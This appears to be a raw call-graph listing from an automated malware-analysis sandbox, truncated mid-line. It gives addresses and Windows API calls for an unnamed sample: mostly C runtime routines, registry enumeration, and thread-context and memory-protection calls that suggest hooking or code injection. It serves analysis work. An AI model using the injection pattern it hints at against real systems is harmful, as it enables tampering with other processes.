GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7547->7611 7549 2408a291673 7612 2408a291000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7549->7612 7551 2408a29167c 7613 2408a291000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7551->7613 7553 2408a291685 7614 2408a291000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7553->7614 7555 2408a29168e RegOpenKeyExW 7556 2408a2916c0 RegOpenKeyExW 7555->7556 7557 2408a2918a6 7555->7557 7558 2408a2916e9 7556->7558 7559 2408a2916ff RegOpenKeyExW 7556->7559 7557->7534 7615 2408a2912bc RegQueryInfoKeyW 7558->7615 7561 2408a29173a RegOpenKeyExW 7559->7561 7562 2408a291723 7559->7562 7565 2408a29175e 7561->7565 7566 2408a291775 RegOpenKeyExW 7561->7566 7624 2408a29104c RegQueryInfoKeyW 7562->7624 7567 2408a2912bc 16 API calls 7565->7567 7568 2408a291799 7566->7568 7569 2408a2917b0 RegOpenKeyExW 7566->7569 7571 2408a29176b RegCloseKey 7567->7571 7572 2408a2912bc 16 API calls 7568->7572 7573 2408a2917eb RegOpenKeyExW 7569->7573 7574 2408a2917d4 7569->7574 7571->7566 7575 2408a2917a6 RegCloseKey 7572->7575 7577 2408a29180f 7573->7577 7578 2408a291826 RegOpenKeyExW 7573->7578 7576 2408a2912bc 16 API calls 7574->7576 7575->7569 7579 2408a2917e1 RegCloseKey 7576->7579 7580 2408a29104c 6 API calls 7577->7580 7581 2408a29184a 7578->7581 7582 2408a291861 RegOpenKeyExW 7578->7582 7579->7573 7586 2408a29181c RegCloseKey 7580->7586 7583 2408a29104c 6 API calls 7581->7583 7584 2408a29189c RegCloseKey 7582->7584 7585 2408a291885 7582->7585 7587 2408a291857 RegCloseKey 7583->7587 7584->7557 7588 2408a29104c 6 API calls 7585->7588 7586->7578 7587->7582 7589 2408a291892 RegCloseKey 7588->7589 7589->7584 7634 2408a2914a4 7590->7634 7607->7541 7608->7543 7609->7545 7610->7547 7611->7549 7612->7551 7613->7553 7614->7555 7616 2408a29148a RegCloseKey 7615->7616 7617 2408a291327 GetProcessHeap HeapAlloc 7615->7617 7616->7559 7618 2408a291352 RegEnumValueW 7617->7618 7619 2408a291476 GetProcessHeap HeapFree 7617->7619 7620 2408a2913a5 7618->7620 7619->7616 7620->7618 7620->7619 7622 2408a29141e lstrlenW GetProcessHeap HeapAlloc StrCpyW 7620->7622 7623 2408a2913d3 GetProcessHeap HeapAlloc GetProcessHeap HeapFree 7620->7623 7629 2408a29152c 7620->7629 7622->7620 7623->7622 7625 2408a2910bf 7624->7625 7626 2408a2911b5 RegCloseKey 7624->7626 7625->7626 7627 2408a2910cf RegEnumValueW 7625->7627 7628 2408a29114e GetProcessHeap HeapAlloc GetProcessHeap HeapFree 7625->7628 7626->7561 7627->7625 7628->7625 7632 2408a29157c 7629->7632 7633 2408a291546 7629->7633 7630 2408a29155d StrCmpIW 7630->7633 7631 2408a291565 StrCmpW 7631->7633 7632->7620 7633->7630 7633->7631 7633->7632 7635 2408a2914e1 GetProcessHeap HeapFree GetProcessHeap HeapFree 7634->7635 7636 2408a2914c1 GetProcessHeap HeapFree 7634->7636 7636->7635 7636->7636 9304 2408a2a41c8 9305 2408a2a41d9 CloseHandle 9304->9305 9306 2408a2a41df 9304->9306 9305->9306 8274 2408a2a52c9 8275 2408a299a64 __CxxCallCatchBlock 9 API calls 8274->8275 8276 2408a2a52d7 8275->8276 8277 2408a2a52e2 8276->8277 8278 2408a299a64 __CxxCallCatchBlock 9 API calls 8276->8278 8278->8277 8279 2408a2a50cf 8280 2408a2a50e7 8279->8280 8286 2408a2a5152 8279->8286 8281 2408a299a64 __CxxCallCatchBlock 9 API calls 8280->8281 8280->8286 8282 2408a2a5134 8281->8282 8283 2408a299a64 __CxxCallCatchBlock 9 API calls 8282->8283 8284 2408a2a5149 8283->8284 8285 2408a29cad8 23 API calls 8284->8285 8285->8286 8959 2408a297f4c 8960 2408a297f70 __scrt_acquire_startup_lock 8959->8960 8961 2408a29bd15 8960->8961 8962 2408a29d3d0 __std_exception_copy 11 API calls 8960->8962 8963 2408a29bd3e 8962->8963 8287 2408a29decc 8288 2408a29def1 8287->8288 8297 2408a29df08 8287->8297 8289 2408a29dadc __std_exception_copy 11 API calls 8288->8289 8290 2408a29def6 8289->8290 8292 2408a29d9a0 _invalid_parameter_noinfo 49 API calls 8290->8292 8291 2408a29dfc0 8341 2408a29c32c 8291->8341 8294 2408a29df01 8292->8294 8296 2408a29e020 8299 2408a29db74 __free_lconv_mon 11 API calls 8296->8299 8297->8291 8302 2408a29df98 8297->8302 8304 2408a29df55 8297->8304 8319 2408a29e110 8297->8319 8301 2408a29e027 8299->8301 8300 2408a29e0b1 8303 2408a29db74 __free_lconv_mon 11 API calls 8300->8303 8306 2408a29df78 8301->8306 8308 2408a29db74 __free_lconv_mon 11 API calls 8301->8308 8302->8306 8309 2408a29db74 __free_lconv_mon 11 API calls 8302->8309 8307 2408a29e0bc 8303->8307 8304->8306 8312 2408a29db74 __free_lconv_mon 11 API calls 8304->8312 8305 2408a29e052 8305->8300 8305->8305 8316 2408a29e0f7 8305->8316 8347 2408a2a1380 8305->8347 8311 2408a29db74 __free_lconv_mon 11 API calls 8306->8311 8310 2408a29e0d5 8307->8310 8314 2408a29db74 __free_lconv_mon 11 API calls 8307->8314 8308->8301 8309->8302 8315 2408a29db74 __free_lconv_mon 11 API calls 8310->8315 8311->8294 8312->8304 8314->8307 8315->8294 8317 2408a29d9c0 _invalid_parameter_noinfo 17 API calls 8316->8317 8318 2408a29e10c 8317->8318 8320 2408a29e13e 8319->8320 8320->8320 8321 2408a29dafc _invalid_parameter_noinfo 11 API calls 8320->8321 8322 2408a29e189 8321->8322 8323 2408a2a1380 49 API calls 8322->8323 8324 2408a29e1bf 8323->8324 8325 2408a29d9c0 _invalid_parameter_noinfo 17 API calls 8324->8325 8326 2408a29e293 8325->8326 8356 2408a29e5e4 8326->8356 8333 2408a29e43d 8334 2408a29e5e4 23 API calls 8333->8334 8335 2408a29e46d 8334->8335 8336 2408a29f9d8 5 API calls 8335->8336 8337 2408a29e496 8336->8337 8389 2408a29dd40 8337->8389 8340 2408a29e110 59 API calls 8342 2408a29c344 8341->8342 8346 2408a29c37c 8341->8346 8343 2408a29dafc _invalid_parameter_noinfo 11 API calls 8342->8343 8342->8346 8344 2408a29c372 8343->8344 8345 2408a29db74 __free_lconv_mon 11 API calls 8344->8345 8345->8346 8346->8296 8346->8305 8350 2408a2a139d 8347->8350 8348 2408a2a13a2 8349 2408a29dadc __std_exception_copy 11 API calls 8348->8349 8353 2408a2a13b8 8348->8353 8355 2408a2a13ac 8349->8355 8350->8348 8351 2408a2a13ec 8350->8351 8350->8353 8351->8353 8354 2408a29dadc __std_exception_copy 11 API calls 8351->8354 8352 2408a29d9a0 _invalid_parameter_noinfo 49 API calls 8352->8353 8353->8305 8354->8355 8355->8352 8357 2408a29e608 8356->8357 8363 2408a29e376 8356->8363 8358 2408a29d258 _invalid_parameter_noinfo 23 API calls 8357->8358 8357->8363 8359 2408a29e623 8358->8359 8411 2408a2a082c 8359->8411 8364 2408a29f9d8 8363->8364 8365 2408a29f7c4 5 API calls 8364->8365 8366 2408a29e3a1 8365->8366 8367 2408a29dbc4 8366->8367 8368 2408a29dbee 8367->8368 8369 2408a29dc12 8367->8369 8373 2408a29db74 __free_lconv_mon 11 API calls 8368->8373 8378 2408a29dbfd FindFirstFileExW 8368->8378 8370 2408a29dc6c 8369->8370 8371 2408a29dc17 8369->8371 8426 2408a29f4ac 8370->8426 8374 2408a29dc2c 8371->8374 8375 2408a29db74 __free_lconv_mon 11 API calls 8371->8375 8371->8378 8373->8378 8419 2408a29ce3c 8374->8419 8375->8374 8378->8333 8390 2408a29dd6a 8389->8390 8391 2408a29dd8e 8389->8391 8395 2408a29db74 __free_lconv_mon 11 API calls 8390->8395 8396 2408a29dd79 8390->8396 8392 2408a29dde8 8391->8392 8393 2408a29dd94 8391->8393 8429 2408a29f53c 8392->8429 8393->8396 8397 2408a29dda9 8393->8397 8398 2408a29db74 __free_lconv_mon 11 API calls 8393->8398 8395->8396 8396->8340 8399 2408a29ce3c 12 API calls 8397->8399 8398->8397 8399->8396 8412 2408a2a0841 8411->8412 8413 2408a29e646 8411->8413 8412->8413 8414 2408a2a0e8c _invalid_parameter_noinfo 23 API calls 8412->8414 8415 2408a2a0898 8413->8415 8414->8413 8416 2408a2a08ad 8415->8416 8417 2408a2a08c0 8415->8417 8416->8417 8418 2408a29f120 _invalid_parameter_noinfo 23 API calls 8416->8418 8417->8363 8418->8417 8420 2408a29ce87 8419->8420 8424 2408a29ce4b _invalid_parameter_noinfo 8419->8424 8421 2408a29dadc __std_exception_copy 11 API calls 8420->8421 8423 2408a29ce85 8421->8423 8422 2408a29ce6e HeapAlloc 8422->8423 8422->8424 8423->8378 8424->8420 8424->8422 8425 2408a29bc8c _invalid_parameter_noinfo 2 API calls 8424->8425 8425->8424 8427 2408a29f4b5 MultiByteToWideChar 8426->8427 8431 2408a29f560 WideCharToMultiByte 8429->8431 8008 2408a298440 8011 2408a299818 8008->8011 8010 2408a298469 8012 2408a29986e __std_exception_destroy 8011->8012 8013 2408a299839 8011->8013 8012->8010 8013->8012 8015 2408a29cb18 8013->8015 8016 2408a29cb2f 8015->8016 8017 2408a29cb25 8015->8017 8018 2408a29dadc __std_exception_copy 11 API calls 8016->8018 8017->8016 8022 2408a29cb4a 8017->8022 8019 2408a29cb36 8018->8019 8020 2408a29d9a0 _invalid_parameter_noinfo 49 API calls 8019->8020 8021 2408a29cb42 8020->8021 8021->8012 8022->8021 8023 2408a29dadc __std_exception_copy 11 API calls 8022->8023 8023->8019 8432 2408a297ec0 8433 2408a297ec9 __scrt_acquire_startup_lock 8432->8433 8435 2408a297ecd 8433->8435 8436 2408a29c38c 8433->8436 8437 2408a29c3ac 8436->8437 8466 2408a29c3c3 8436->8466 8438 2408a29c3ca 8437->8438 8439 2408a29c3b4 8437->8439 8467 2408a29f0c0 8438->8467 8440 2408a29dadc __std_exception_copy 11 API calls 8439->8440 8442 2408a29c3b9 8440->8442 8444 2408a29d9a0 _invalid_parameter_noinfo 49 API calls 8442->8444 8444->8466 8449 2408a29c32c 11 API calls 8450 2408a29c439 8449->8450 8451 2408a29c459 8450->8451 8452 2408a29c441 8450->8452 8454 2408a29c164 23 API calls 8451->8454 8453 2408a29dadc __std_exception_copy 11 API calls 8452->8453 8455 2408a29c446 8453->8455 8458 2408a29c475 8454->8458 8456 2408a29db74 __free_lconv_mon 11 API calls 8455->8456 8456->8466 8457 2408a29c47b 8459 2408a29db74 __free_lconv_mon 11 API calls 8457->8459 8458->8457 8460 2408a29c4c0 8458->8460 8461 2408a29c4a7 8458->8461 8459->8466 8464 2408a29db74 __free_lconv_mon 11 API calls 8460->8464 8462 2408a29db74 __free_lconv_mon 11 API calls 8461->8462 8463 2408a29c4b0 8462->8463 8465 2408a29db74 __free_lconv_mon 11 API calls 8463->8465 8464->8457 8465->8466 8466->8435 8468 2408a29c3cf 8467->8468 8469 2408a29f0cd 8467->8469 8473 2408a29e7a4 GetModuleFileNameW 8468->8473 8491 2408a29d32c 8469->8491 8471 2408a29f0fc 8508 2408a29ed98 8471->8508 8474 2408a29e7e9 GetLastError 8473->8474 8475 2408a29e7fd 8473->8475 8649 2408a29da50 8474->8649 8477 2408a29e5e4 23 API calls 8475->8477 8479 2408a29e82b 8477->8479 8478 2408a29e7f6 8480 2408a297d70 _log10_special 8 API calls 8478->8480 8481 2408a29f9d8 5 API calls 8479->8481 8484 2408a29e83c 8479->8484 8483 2408a29c3e6 8480->8483 8481->8484 8485 2408a29c164 8483->8485 8654 2408a29e688 8484->8654 8487 2408a29c1a2 8485->8487 8489 2408a29c20e 8487->8489 8668 2408a29f470 8487->8668 8488 2408a29c2ff 8488->8449 8489->8488 8490 2408a29f470 23 API calls 8489->8490 8490->8489 8492 2408a29d358 FlsSetValue 8491->8492 8493 2408a29d33d FlsGetValue 8491->8493 8495 2408a29d365 8492->8495 8496 2408a29d34a 8492->8496 8494 2408a29d352 8493->8494 8493->8496 8494->8492 8497 2408a29dafc _invalid_parameter_noinfo 11 API calls 8495->8497 8496->8471 8498 2408a29d374 8497->8498 8499 2408a29d392 FlsSetValue 8498->8499 8500 2408a29d382 FlsSetValue 8498->8500 8502 2408a29d39e FlsSetValue 8499->8502 8503 2408a29d3b0 8499->8503 8501 2408a29d38b 8500->8501 8505 2408a29db74 __free_lconv_mon 11 API calls 8501->8505 8502->8501 8504 2408a29cfc4 _invalid_parameter_noinfo 11 API calls 8503->8504 8506 2408a29d3b8 8504->8506 8505->8496 8507 2408a29db74 __free_lconv_mon 11 API calls 8506->8507 8507->8496 8531 2408a29f008 8508->8531 8513 2408a29edea 8513->8468 8514 2408a29ce3c 12 API calls 8515 2408a29edfb 8514->8515 8516 2408a29ee03 8515->8516 8518 2408a29ee12 8515->8518 8517 2408a29db74 __free_lconv_mon 11 API calls 8516->8517 8517->8513 8518->8518 8550 2408a29f13c 8518->8550 8521 2408a29ef0e 8522 2408a29dadc __std_exception_copy 11 API calls 8521->8522 8524 2408a29ef13 8522->8524 8523 2408a29ef69 8526 2408a29efd0 8523->8526 8561 2408a29e8c8 8523->8561 8527 2408a29db74 __free_lconv_mon 11 API calls 8524->8527 8525 2408a29ef28 8525->8523 8528 2408a29db74 __free_lconv_mon 11 API calls 8525->8528 8530 2408a29db74 __free_lconv_mon 11 API calls 8526->8530 8527->8513 8528->8523 8530->8513 8532 2408a29f02b 8531->8532 8533 2408a29f035 8532->8533 8576 2408a29cdcc EnterCriticalSection 8532->8576 8536 2408a29edcd 8533->8536 8540 2408a29d32c 16 API calls 8533->8540 8543 2408a29ea98 8536->8543 8541 2408a29f0fc 8540->8541 8542 2408a29ed98 69 API calls 8541->8542 8542->8536 8544 2408a29e5e4 23 API calls 8543->8544 8545 2408a29eaac 8544->8545 8546 2408a29eaca 8545->8546 8547 2408a29eab8 GetOEMCP 8545->8547 8548 2408a29eadf 8546->8548 8549 2408a29eacf GetACP 8546->8549 8547->8548 8548->8513 8548->8514 8549->8548 8551 2408a29ea98 25 API calls 8550->8551 8553 2408a29f169 8551->8553 8552 2408a29f2bf 8555 2408a297d70 _log10_special 8 API calls 8552->8555 8553->8552 8554 2408a29f1c0 8553->8554 8556 2408a29f1a6 IsValidCodePage 8553->8556 8577 2408a29ebb0 8554->8577 8558 2408a29ef05 8555->8558 8556->8552 8557 2408a29f1b7 8556->8557 8557->8554 8559 2408a29f1e6 GetCPInfo 8557->8559 8558->8521 8558->8525 8559->8552 8559->8554 8648 2408a29cdcc EnterCriticalSection 8561->8648 8578 2408a29ebed GetCPInfo 8577->8578 8587 2408a29ece3 8577->8587 8583 2408a29ec00 8578->8583 8578->8587 8579 2408a297d70 _log10_special 8 API calls 8581 2408a29ed82 8579->8581 8581->8552 8588 2408a2a1974 8583->8588 8586 2408a2a1e38 40 API calls 8586->8587 8587->8579 8589 2408a29e5e4 23 API calls 8588->8589 8590 2408a2a19b6 8589->8590 8591 2408a29f4ac MultiByteToWideChar 8590->8591 8593 2408a2a19ec 8591->8593 8592 2408a2a19f3 8595 2408a297d70 _log10_special 8 API calls 8592->8595 8593->8592 8594 2408a29ce3c 12 API calls 8593->8594 8597 2408a2a1ab0 8593->8597 8599 2408a2a1a1c 8593->8599 8594->8599 8596 2408a29ec77 8595->8596 8603 2408a2a1e38 8596->8603 8597->8592 8598 2408a29db74 __free_lconv_mon 11 API calls 8597->8598 8598->8592 8599->8597 8600 2408a29f4ac MultiByteToWideChar 8599->8600 8601 2408a2a1a92 8600->8601 8601->8597 8602 2408a2a1a96 GetStringTypeW 8601->8602 8602->8597 8604 2408a29e5e4 23 API calls 8603->8604 8605 2408a2a1e5d 8604->8605 8608 2408a2a1b04 8605->8608 8609 2408a2a1b45 8608->8609 8610 2408a29f4ac MultiByteToWideChar 8609->8610 8613 2408a2a1b8f 8610->8613 8611 2408a2a1e0d 8612 2408a297d70 _log10_special 8 API calls 8611->8612 8614 2408a29ecaa 8612->8614 8613->8611 8615 2408a29ce3c 12 API calls 8613->8615 8617 2408a2a1bc7 8613->8617 8627 2408a2a1cc5 8613->8627 8614->8586 8615->8617 8616 2408a29db74 __free_lconv_mon 11 API calls 8616->8611 8618 2408a29f4ac MultiByteToWideChar 8617->8618 8617->8627 8619 2408a2a1c3a 8618->8619 8619->8627 8639 2408a29faac 8619->8639 8622 2408a2a1c85 8626 2408a29faac 6 API calls 8622->8626 8622->8627 8623 2408a2a1da8 8623->8627 8628 2408a29db74 __free_lconv_mon 11 API calls 8623->8628 8624 2408a2a1cd6 8624->8623 8625 2408a29ce3c 12 API calls 8624->8625 8629 2408a2a1cf4 8624->8629 8625->8629 8626->8627 8627->8611 8627->8616 8628->8627 8629->8627 8630 2408a29faac 6 API calls 8629->8630 8631 2408a2a1d74 8630->8631 8631->8623 8632 2408a2a1daa 8631->8632 8633 2408a2a1d94 8631->8633 8634 2408a29f53c WideCharToMultiByte 8632->8634 8635 2408a29f53c WideCharToMultiByte 8633->8635 8636 2408a2a1da2 8634->8636 8635->8636 8636->8623 8637 2408a2a1dc2 8636->8637 8637->8627 8638 2408a29db74 __free_lconv_mon 11 API calls 8637->8638 8638->8627 8640 2408a29f7c4 5 API calls 8639->8640 8641 2408a29faea 8640->8641 8642 2408a29faf2 8641->8642 8645 2408a29fb98 8641->8645 8642->8622 8642->8624 8642->8627 8644 2408a29fb5b LCMapStringW 8644->8642 8646 2408a29f7c4 5 API calls 8645->8646 8647 2408a29fbc6 8646->8647 8647->8644 8650 2408a29d3d0 __std_exception_copy 11 API calls 8649->8650 8651 2408a29da5d __free_lconv_mon 8650->8651 8652 2408a29d3d0 __std_exception_copy 11 API calls 8651->8652 8653 2408a29da7f 8652->8653 8653->8478 8655 2408a29e6c7 8654->8655 8659 2408a29e6ac 8654->8659 8656 2408a29f53c WideCharToMultiByte 8655->8656 8661 2408a29e6cc 8655->8661 8657 2408a29e723 8656->8657 8660 2408a29e72a GetLastError 8657->8660 8657->8661 8662 2408a29e755 8657->8662 8658 2408a29dadc __std_exception_copy 11 API calls 8658->8659 8659->8478 8663 2408a29da50 11 API calls 8660->8663 8661->8658 8661->8659 8665 2408a29f53c WideCharToMultiByte 8662->8665 8664 2408a29e737 8663->8664 8666 2408a29dadc __std_exception_copy 11 API calls 8664->8666 8667 2408a29e77c 8665->8667 8666->8659 8667->8659 8667->8660 8669 2408a29f3fc 8668->8669 8670 2408a29e5e4 23 API calls 8669->8670 8671 2408a29f420 8670->8671 8671->8487 8024 2408a29b444 8047 2408a299a64 8024->8047 8026 2408a29b479 8027 2408a299a64 __CxxCallCatchBlock 9 API calls 8026->8027 8028 2408a29b487 __except_validate_context_record 8027->8028 8029 2408a299a64 __CxxCallCatchBlock 9 API calls 8028->8029 8030 2408a29b4cb 8029->8030 8031 2408a299a64 __CxxCallCatchBlock 9 API calls 8030->8031 8032 2408a29b4d4 8031->8032 8033 2408a299a64 __CxxCallCatchBlock 9 API calls 8032->8033 8034 2408a29b4dd 8033->8034 8050 2408a29a084 8034->8050 8037 2408a299a64 __CxxCallCatchBlock 9 API calls 8038 2408a29b50d __CxxCallCatchBlock 8037->8038 8057 2408a29a0c0 8038->8057 8040 2408a29b5e7 __CxxCallCatchBlock 8041 2408a299a64 __CxxCallCatchBlock 9 API calls 8040->8041 8042 2408a29b5fa 8041->8042 8044 2408a299a64 __CxxCallCatchBlock 9 API calls 8042->8044 8045 2408a29b603 8044->8045 8068 2408a299a80 8047->8068 8049 2408a299a6d 8049->8026 8051 2408a299a64 __CxxCallCatchBlock 9 API calls 8050->8051 8052 2408a29a095 8051->8052 8053 2408a29a0a0 8052->8053 8054 2408a299a64 __CxxCallCatchBlock 9 API calls 8052->8054 8055 2408a299a64 __CxxCallCatchBlock 9 API calls 8053->8055 8054->8053 8056 2408a29a0b1 8055->8056 8056->8037 8056->8038 8058 2408a299a64 __CxxCallCatchBlock 9 API calls 8057->8058 8059 2408a29a0d2 8058->8059 8060 2408a29a10d 8059->8060 8061 2408a299a64 __CxxCallCatchBlock 9 API calls 8059->8061 8062 2408a29a0dd 8061->8062 8062->8060 8063 2408a299a64 __CxxCallCatchBlock 9 API calls 8062->8063 8064 2408a29a0fe 8063->8064 8064->8040 8065 2408a299750 8064->8065 8066 2408a299a64 __CxxCallCatchBlock 9 API calls 8065->8066 8067 2408a29975e 8066->8067 8067->8040 8069 2408a299a98 8068->8069 8070 2408a299a9f GetLastError 8068->8070 8069->8049 8080 2408a29a3d4 8070->8080 8081 2408a29a1f4 __vcrt_FlsAlloc 5 API calls 8080->8081 8082 2408a29a3fb TlsGetValue 8081->8082 8672 2408a2928c4 8674 2408a29290a 8672->8674 8673 2408a292970 8674->8673 8675 2408a293c74 StrCmpNIW 8674->8675 8675->8674 8084 2408a292a58 8086 2408a292aac 8084->8086 8085 2408a292ac7 8086->8085 8088 2408a2933f8 8086->8088 8089 2408a29348e 8088->8089 8091 2408a29341d 8088->8091 8089->8085 8090 2408a293c74 StrCmpNIW 8090->8091 8091->8089 8091->8090 8092 2408a291d0c StrCmpIW StrCmpW 8091->8092 8092->8091 9307 2408a2a39db 9309 2408a2a3c80 9307->9309 9312 2408a2a3a1b 9307->9312 9308 2408a2a3c62 9315 2408a2a4790 9308->9315 9310 2408a2a3c76 9309->9310 9314 2408a2a4790 _log10_special 20 API calls 9309->9314 9311 2408a2a3a4f 9312->9308 9312->9309 9312->9311 9314->9310 9318 2408a2a47b0 9315->9318 9320 2408a2a47ca 9318->9320 9319 2408a2a47ab 9319->9310 9320->9319 9322 2408a2a45f0 9320->9322 9323 2408a2a4630 _log10_special 9322->9323 9326 2408a2a469c _log10_special 9323->9326 9333 2408a2a48b0 9323->9333 9325 2408a2a46d9 9340 2408a2a4be0 9325->9340 9326->9325 9327 2408a2a46a9 9326->9327 9336 2408a2a44cc 9327->9336 9330 2408a2a46d7 _log10_special 9331 2408a297d70 _log10_special 8 API calls 9330->9331 9332 2408a2a4701 9331->9332 9332->9319 9346 2408a2a48d8 9333->9346 9337 2408a2a4510 _log10_special 9336->9337 9338 2408a2a4525 9337->9338 9339 2408a2a4be0 _log10_special 11 API calls 9337->9339 9338->9330 9339->9338 9341 2408a2a4be9 9340->9341 9342 2408a2a4c00 9340->9342 9344 2408a29dadc __std_exception_copy 11 API calls 9341->9344 9345 2408a2a4bf8 9341->9345 9343 2408a29dadc __std_exception_copy 11 API calls 9342->9343 9343->9345 9344->9345 9345->9330 9347 2408a2a4917 _raise_exc _clrfp 9346->9347 9348 2408a2a4b2c RaiseException 9347->9348 9349 2408a2a48d2 9348->9349 9349->9326 8964 2408a29d558 8965 2408a29d568 8964->8965 8966 2408a29d3d0 __std_exception_copy 11 API calls 8965->8966 8967 2408a29d573 __vcrt_uninitialize_ptd 8965->8967 8966->8967 8694 2408a2a18d3 8695 2408a2a18e0 8694->8695 8696 2408a2a18f5 8695->8696 8697 2408a2a190e 8695->8697 8698 2408a29dadc __std_exception_copy 11 API calls 8696->8698 8700 2408a29e5e4 23 API calls 8697->8700 8702 2408a2a1905 8697->8702 8699 2408a2a18fa 8698->8699 8701 2408a29d9a0 _invalid_parameter_noinfo 49 API calls 8699->8701 8700->8702 8701->8702 8703 2408a2960d3 8704 2408a2960e0 8703->8704 8705 2408a2960ec GetThreadContext 8704->8705 8710 2408a29624a 8704->8710 8706 2408a296112 8705->8706 8705->8710 8706->8710 8711 2408a296139 8706->8711 8707 2408a29632e 8709 2408a29634e 8707->8709 8721 2408a294810 8707->8721 8708 2408a296271 VirtualProtect FlushInstructionCache 8708->8710 8725 2408a295220 GetCurrentProcess 8709->8725 8710->8707 8710->8708 8713 2408a2961bd 8711->8713 8715 2408a296196 SetThreadContext 8711->8715 8715->8713 8716 2408a2963a7 8719 2408a297d70 _log10_special 8 API calls 8716->8719 8717 2408a296367 ResumeThread 8718 2408a296353 8717->8718 8718->8716 8718->8717 8720 2408a2963ef 8719->8720 8723 2408a29482c 8721->8723 8722 2408a29488f 8722->8709 8723->8722 8724 2408a294842 VirtualFree 8723->8724 8724->8723 8726 2408a29523c 8725->8726 8727 2408a295283 8726->8727 8728 2408a295252 VirtualProtect FlushInstructionCache 8726->8728 8727->8718 8728->8726 8729 2408a2a1ed0 8730 2408a29f0c0 69 API calls 8729->8730 8731 2408a2a1ed9 8730->8731 9350 2408a29b7d4 9357 2408a29b707 __CxxCallCatchBlock __FrameHandler3::GetHandlerSearchState 9350->9357 9351 2408a29b7fb 9352 2408a299a64 __CxxCallCatchBlock 9 API calls 9351->9352 9353 2408a29b800 9352->9353 9354 2408a299a64 __CxxCallCatchBlock 9 API calls 9353->9354 9355 2408a29b80b __FrameHandler3::GetHandlerSearchState 9353->9355 9354->9355 9356 2408a29a114 9 API calls Is_bad_exception_allowed 9356->9357 9357->9351 9357->9355 9357->9356 9358 2408a29a13c __FrameHandler3::FrameUnwindToEmptyState 9 API calls 9357->9358 9358->9357 8968 2408a29b1a8 8969 2408a29b1d5 __except_validate_context_record 8968->8969 8970 2408a299a64 __CxxCallCatchBlock 9 API calls 8969->8970 8973 2408a29b1da 8970->8973 8971 2408a29b2c2 8976 2408a29b2e1 8971->8976 9004 2408a29a114 8971->9004 8972 2408a29b234 8974 2408a29b2af 8972->8974 8982 2408a29b288 8972->8982 8983 2408a29b256 __GetCurrentState 8972->8983 8973->8971 8973->8972 8973->8982 8997 2408a299d10 8974->8997 8981 2408a29b330 8976->8981 8976->8982 9007 2408a29a128 8976->9007 8980 2408a29b3d9 8981->8982 9010 2408a29a974 8981->9010 8983->8980 8985 2408a29b6b8 8983->8985 8986 2408a29a114 Is_bad_exception_allowed 9 API calls 8985->8986 8987 2408a29b6e7 __GetCurrentState 8986->8987 8988 2408a299a64 __CxxCallCatchBlock 9 API calls 8987->8988 8995 2408a29b704 __CxxCallCatchBlock __FrameHandler3::GetHandlerSearchState 8988->8995 8989 2408a29b7fb 8990 2408a299a64 __CxxCallCatchBlock 9 API calls 8989->8990 8991 2408a29b800 8990->8991 8992 2408a299a64 __CxxCallCatchBlock 9 API calls 8991->8992 8993 2408a29b80b __FrameHandler3::GetHandlerSearchState 8991->8993 8992->8993 8993->8982 8994 2408a29a114 9 API calls Is_bad_exception_allowed 8994->8995 8995->8989 8995->8993 8995->8994 9067 2408a29a13c 8995->9067 9070 2408a299d74 8997->9070 8999 2408a299d2f __FrameHandler3::GetHandlerSearchState 9074 2408a299c80 8999->9074 9002 2408a29b6b8 __FrameHandler3::FrameUnwindToEmptyState 9 API calls 9003 2408a299d64 9002->9003 9003->8982 9005 2408a299a64 __CxxCallCatchBlock 9 API calls 9004->9005 9006 2408a29a11d 9005->9006 9006->8976 9008 2408a299a64 __CxxCallCatchBlock 9 API calls 9007->9008 9009 2408a29a131 9008->9009 9009->8981 9078 2408a29b844 9010->9078 9012 2408a29ae42 9013 2408a29ad93 9013->9012 9053 2408a29ad91 9013->9053 9131 2408a29ae4c 9013->9131 9014 2408a29aabb 9014->9013 9039 2408a29aaf3 9014->9039 9015 2408a299a64 __CxxCallCatchBlock 9 API calls 9019 2408a29add5 9015->9019 9017 2408a299a64 __CxxCallCatchBlock 9 API calls 9021 2408a29aa22 9017->9021 9019->9012 9022 2408a297d70 _log10_special 8 API calls 9019->9022 9020 2408a29acc4 9023 2408a29ace1 9020->9023 9026 2408a29a114 Is_bad_exception_allowed 9 API calls 9020->9026 9020->9053 9021->9019 9024 2408a299a64 __CxxCallCatchBlock 9 API calls 9021->9024 9025 2408a29ade8 9022->9025 9029 2408a29ad03 9023->9029 9023->9053 9124 2408a299ce4 9023->9124 9028 2408a29aa32 9024->9028 9025->8982 9026->9023 9030 2408a299a64 __CxxCallCatchBlock 9 API calls 9028->9030 9031 2408a29ad19 9029->9031 9029->9053 9064 2408a29ae25 9029->9064 9032 2408a29aa3b 9030->9032 9033 2408a29ad24 9031->9033 9036 2408a29a114 Is_bad_exception_allowed 9 API calls 9031->9036 9089 2408a29a154 9032->9089 9041 2408a29b8dc 9 API calls 9033->9041 9034 2408a299a64 __CxxCallCatchBlock 9 API calls 9037 2408a29ae2b 9034->9037 9036->9033 9040 2408a299a64 __CxxCallCatchBlock 9 API calls 9037->9040 9039->9020 9042 2408a29a128 9 API calls 9039->9042 9103 2408a29b068 9039->9103 9117 2408a29a8a0 9039->9117 9043 2408a29ae34 9040->9043 9044 2408a29ad3b 9041->9044 9042->9039 9046 2408a29cad8 23 API calls 9043->9046 9048 2408a299d74 __FrameHandler3::GetHandlerSearchState RtlLookupFunctionEntry 9044->9048 9044->9053 9045 2408a299a64 __CxxCallCatchBlock 9 API calls 9047 2408a29aa7d 9045->9047 9046->9012 9047->9014 9049 2408a299a64 __CxxCallCatchBlock 9 API calls 9047->9049 9050 2408a29ad55 9048->9050 9052 2408a29aa89 9049->9052 9128 2408a299f80 RtlUnwindEx 9050->9128 9054 2408a299a64 __CxxCallCatchBlock 9 API calls 9052->9054 9053->9015 9056 2408a29aa92 9054->9056 9092 2408a29b8dc 9056->9092 9060 2408a29aaa6 9099 2408a29b9cc 9060->9099 9062 2408a29ae1f 9063 2408a29cad8 23 API calls 9062->9063 9063->9064 9064->9034 9065 2408a29aaae __CxxCallCatchBlock std::bad_alloc::bad_alloc 9065->9062 9066 2408a2998d0 Concurrency::cancel_current_task 2 API calls 9065->9066 9066->9062 9068 2408a299a64 __CxxCallCatchBlock 9 API calls 9067->9068 9069 2408a29a14a 9068->9069 9069->8995 9071 2408a299da2 __FrameHandler3::GetHandlerSearchState 9070->9071 9072 2408a299e12 9071->9072 9073 